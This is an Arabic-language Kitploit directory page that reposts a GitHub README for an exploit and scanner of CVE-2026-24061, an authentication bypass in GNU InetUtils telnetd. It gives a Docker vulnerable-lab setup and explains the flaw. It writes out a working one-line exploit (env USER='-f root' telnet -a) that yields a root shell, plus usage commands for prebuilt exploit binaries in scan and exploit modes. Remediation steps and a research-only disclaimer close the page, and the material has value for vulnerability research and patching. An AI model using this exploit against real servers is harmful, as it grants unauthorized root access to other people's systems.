Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — استغلال وماسح ضوئي لـ CVE-2026-24061، وهو تجاوز مصادقة في telnetd يمنح صلاحية shell بصلاحيات الجذر عبر متغير بيئة USER مُصمَّم خصيصًا. يتضمن إعداد بيئة Docker وملفات ثنائية للاستغلال متعددة المنصات. | Kitploit
أدوات/GitHubGitHub/parad0x7e/cve-2026-24061
تحليل الثغرات الأمنيةالاستغلالأمن الشبكاتاختبار الاختراقالمصادقةأداة الوصول عن بعد
GitHubparad0x7e/cve-2026-24061

CVE-2026-24061

استغلال وماسح ضوئي لـ CVE-2026-24061، وهو تجاوز مصادقة في telnetd يمنح صلاحية shell بصلاحيات الجذر عبر متغير بيئة USER مُصمَّم خصيصًا. يتضمن إعداد بيئة Docker وملفات ثنائية للاستغلال متعددة المنصات.

عرض المستودع
8منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061: ثغرة تجاوز المصادقة في telnetd

CVE-2026-24061 هي ثغرة تجاوز مصادقة في telnetd تسمح للمهاجمين بتجاوز التحقق من الهوية عبر مجموعات محددة من متغيرات البيئة والحصول مباشرة على شل بصلاحيات الجذر (root).

يوجد خلل في منطق المصادقة في telnetd. عند استخدام الخيار -a (تسجيل الدخول التلقائي) مع متغير بيئة USER محدد (مثل -f root)، يمكن تجاوز عملية المصادقة العادية وتسجيل الدخول مباشرة كمستخدم الجذر.

مقدمة

GNU InetUtils هي مجموعة من أدوات الشبكة الأساسية ضمن مشروع GNU. تحتوي على العديد من عملاء وخوادم الشبكة التقليدية، مثل ftp وtelnet وrsh وrlogin وtftp وغيرها، مما يوفر مكتبة مكونات شبكية شاملة بأسلوب GNU. telnetd هو برنامج الخادم في هذه المجموعة المسؤول عن معالجة طلبات اتصال Telnet الواردة، وتتمثل مهمته الأساسية في توفير واجهة طرفية تفاعلية (عادةً Shell) للمستخدمين البعيدين.

كيف يعمل

  1. عادةً ما تتم مراقبته بواسطة inetd أو xinetd على المنفذ 23. عند وصول طلب، يتم تشغيل telnetd.
  2. يتعامل مع التفاوض على خيارات بروتوكول Telnet المحددة (مثل نوع الطرفية، حجم النافذة، مجموعة الأحرف، إلخ).
  3. عادةً ما يستدعي برنامج login الأساسي في النظام للتحقق من اسم المستخدم وكلمة المرور.
  4. بعد تسجيل الدخول بنجاح، يقوم بتخصيص طرفية زائفة (pseudo-terminal) للمستخدم ويبدأ تشغيل الـ Shell المحدد.

المراجع

  • https://github.com/yanxinwu946/CVE-2026-24061--telnetd
  • https://github.com/vulhub/vulhub/
  • https://forum.butian.net/share/4766

إعداد البيئة

أولاً، قم بتنزيل هذا المستودع محلياً. هيكل الدليل كما يلي:

في هذا الدليل، نفّذ الأمر التالي لبدء البيئة المعرضة للثغرة الخاصة بـ CVE-2026-24061:

root@kitploit:~
docker compose up -d --build

بعد بدء التشغيل، ستعمل خدمة telnet على 0.0.0.0:2323

مبدأ الثغرة

  1. يُستخدم الخيار -a في telnetd لتفعيل وظيفة تسجيل الدخول التلقائي
  2. عند تفعيل -a، يقرأ telnetd متغير البيئة USER كاسم مستخدم لتسجيل الدخول
  3. إذا تم تعيين متغير البيئة USER إلى -f root، يفسر telnetd بشكل خاطئ -f كعلامة خيار وroot كمستخدم مستهدف
  4. يؤدي هذا إلى تجاوز فحص المصادقة، وإنشاء جلسة مباشرة كمستخدم الجذر

استغلال الثغرة

الاستغلال اليدوي

root@kitploit:~
# قم بتعيين متغير البيئة USER واتصل باستخدام telnet -a
env USER='-f root' telnet -a 127.0.0.1 2323

عند النجاح، ستحصل على شل تفاعلي بصلاحيات الجذر:

الاستغلال باستخدام الأدوات

root@kitploit:~
cd exp

يمكنك رؤية ثلاثة ملفات: exp وexp_darwin وexp.exe وهي ملفات قابلة للتنفيذ لأنظمة Linux وMac وWindows على التوالي. اختر ما تحتاجه. يتم أيضاً توفير الكود المصدري للأداة. إذا كنت بحاجة إلى إصدارات أخرى، يمكنك تجميعها بنفسك. هنا أستخدم exp لنظام Linux، والذي يحتوي على معلومات مساعدة مفصلة.

اكتشاف ما إذا كانت الثغرة موجودة (يفحص المنفذ 23 افتراضياً):

root@kitploit:~
./exp -mode scan -target your-ip -port your-port

استغلال الثغرة والحصول على شل:

root@kitploit:~
./exp -mode exploit -target your-ip -port your-port

كيفية الإصلاح

  1. قم بترقية inetutils-telnetd إلى أحدث إصدار
  2. قم بتعطيل خدمة telnet في بيئة الإنتاج واستخدم SSH بدلاً منها
  3. قم بنشر خدمة telnet في بيئة شبكة داخلية معزولة
  4. استخدم جدار الحماية لتقييد مصدر الوصول إلى خدمة telnet

إخلاء المسؤولية

هذا المشروع مخصص لأغراض البحث الأمني والتعليم فقط. لا تستخدمه على أنظمة غير مصرح بها. يتحمل المستخدمون كامل المسؤولية القانونية عن أي عواقب ناتجة عن استخدام هذه الأداة.

تنزيل الأداة